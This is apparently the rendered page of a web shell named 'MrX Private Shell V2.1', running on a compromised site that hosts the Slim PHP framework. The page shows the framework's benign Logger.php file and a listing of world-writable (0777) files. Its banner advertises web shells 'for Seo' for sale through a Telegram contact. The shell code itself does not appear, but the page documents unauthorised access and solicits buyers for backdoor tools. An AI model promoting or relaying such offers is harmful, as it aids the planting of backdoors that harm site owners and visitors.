__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Slim Framework (https://slimframework.com)
*
* @license https://github.com/slimphp/Slim/blob/4.x/LICENSE.md (MIT License)
*/
declare(strict_types=1);
namespace Slim;
use Psr\Log\AbstractLogger;
use Psr\Log\InvalidArgumentException;
use Stringable;
use function error_log;
class Logger extends AbstractLogger
{
/**
* @param mixed $level
* @param string|Stringable $message
* @param array<mixed> $context
*
* @throws InvalidArgumentException
*/
public function log($level, $message, array $context = []): void
{
error_log((string) $message);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Error | Folder | 0777 |
|
|
| Exception | Folder | 0777 |
|
|
| Factory | Folder | 0777 |
|
|
| Handlers | Folder | 0777 |
|
|
| Interfaces | Folder | 0777 |
|
|
| Middleware | Folder | 0777 |
|
|
| Routing | Folder | 0777 |
|
|
| App.php | File | 6.61 KB | 0777 |
|
| CallableResolver.php | File | 5.68 KB | 0777 |
|
| Logger.php | File | 637 B | 0777 |
|
| MiddlewareDispatcher.php | File | 8.74 KB | 0777 |
|
| ResponseEmitter.php | File | 3.49 KB | 0777 |
|